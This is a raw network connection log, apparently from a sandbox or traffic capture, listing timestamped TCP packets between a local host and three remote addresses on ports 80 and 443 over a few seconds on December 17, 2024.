Dec 17, 2024 06:03:24.897396088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.897476912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.898334026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.898435116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.898446083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.899452925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.899509907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.899606943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.899882078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.900544882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.900660038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.900741100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.901679993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.901812077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.901891947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.902784109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.902869940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.902955055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.903897047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.904011965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.904185057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.905014992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.905111074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.905134916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.906287909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.906358957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.906388998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.907228947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.907327890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.907355070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.907459974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.908346891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.908457041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.908520937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.909449100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.909581900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.910001993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.910562992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.910677910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.910701036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.911709070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.911791086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.911820889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.912832022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.912893057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.912920952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.913199902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.913908958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.913968086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.914011955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.914297104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.915026903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.915136099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.915332079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.915332079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.916132927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.916277885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.916400909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.917263031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.917340040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.917382956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.918695927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.918804884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.918828011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.919487953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.919603109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.919605970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.919905901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.920933962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.921053886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.921243906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.921729088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.921854973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.922094107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.922828913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.922955990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.922971964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.923958063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.923985958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.924041986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.924056053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.924375057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.925048113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.925115108 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.925169945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.925498962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.926168919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.926223040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.926296949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.926440954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.927278042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.927344084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.927393913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.927459002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.928389072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.928494930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.928570032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.929498911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.929639101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.929725885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.930634022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.930721045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.930763006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.931746960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.931802988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.931858063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.932884932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.932981014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.932984114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.933073044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.933986902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.934086084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.934112072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.934171915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.935091972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.935276985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.935338020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.936193943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.936268091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.936316013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.937300920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.937378883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.937433958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.938438892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.938522100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.938523054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.939538956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.939598083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.939657927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.939737082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.940639019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.940769911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.940821886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.941798925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.941926003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.942008018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.942840099 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.942888975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.942899942 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.942944050 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.942976952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.942989111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.943032026 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.943032026 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.943032026 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.943032980 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.943056107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.943104982 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.943165064 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.943979979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.944114923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.944195986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.945092916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.945158005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.945207119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.946286917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.946367025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.946439028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.947406054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.947501898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.081363916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.081398964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.081459045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.081701040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.081752062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.081804037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.082000971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.082798004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.082851887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.082906961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.082953930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.083935976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.083981991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.084032059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.084075928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.085038900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.085088968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.085136890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.085628033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.086169958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.086280107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.086328030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.087248087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.087374926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.087398052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.087430954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.088418961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.088466883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.088521004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.089494944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.089605093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.089653969 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.090585947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.090708971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.090758085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.091727018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.091775894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.091820955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.091953039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.092829943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.092958927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.092988014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.092999935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.093929052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.094048977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.094100952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.095082045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.095125914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.095216036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.095262051 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.096153975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.096203089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.096259117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.096503019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.097299099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.097356081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.097394943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.097454071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.098416090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.098443985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.098483086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.098505020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.099560976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.099606991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.099653959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.099849939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.100617886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.100667000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.100753069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.100801945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.101752043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.101802111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.101851940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.101902008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.102804899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:25.102857113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:25.141407967 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.141458988 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.141510963 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.141535044 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.141550064 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.142191887 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.149159908 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.149216890 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.149281025 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.149324894 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.149333954 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.149420977 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.149470091 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.150638103 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.150652885 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:25.150707960 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:25.150715113 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:27.452557087 CET	49846	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:27.452891111 CET	49877	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:27.572720051 CET	80	49877	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:27.572813034 CET	49877	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:27.572994947 CET	49877	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:27.573052883 CET	80	49846	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:27.573112011 CET	49846	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:27.693062067 CET	80	49877	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:28.924222946 CET	80	49877	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:28.924474001 CET	49877	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:28.927103996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:28.927558899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:29.047202110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:29.047280073 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:29.047302008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:29.047382116 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:29.047761917 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:29.168440104 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.374780893 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.374845982 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.374864101 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.374876976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.374888897 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.374912024 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.374946117 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.374963999 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.374980927 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.374996901 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.375027895 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.375031948 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.375072956 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.375083923 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.375106096 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.375118017 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.375154018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.375175953 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.375175953 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.375219107 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.496078014 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.496161938 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.496221066 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.496658087 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.500076056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.500113964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.500138998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.500190020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.566767931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.566847086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.566903114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.566903114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.571037054 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.571115971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.571232080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.571232080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.577589035 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.577672958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.578661919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.578661919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.586234093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.586251974 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.586296082 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.594634056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.594719887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.594722033 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.594866991 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.603049040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.603177071 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.603228092 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.603229046 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.611489058 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.611599922 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.611805916 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.619942904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.620042086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.620120049 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.628437996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.628546953 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.628606081 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.628674984 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.636912107 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.637000084 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.637037992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.637128115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.644217968 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.644315958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.644414902 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.651660919 CET	80	49882	31.41.244.11	192.168.2.5
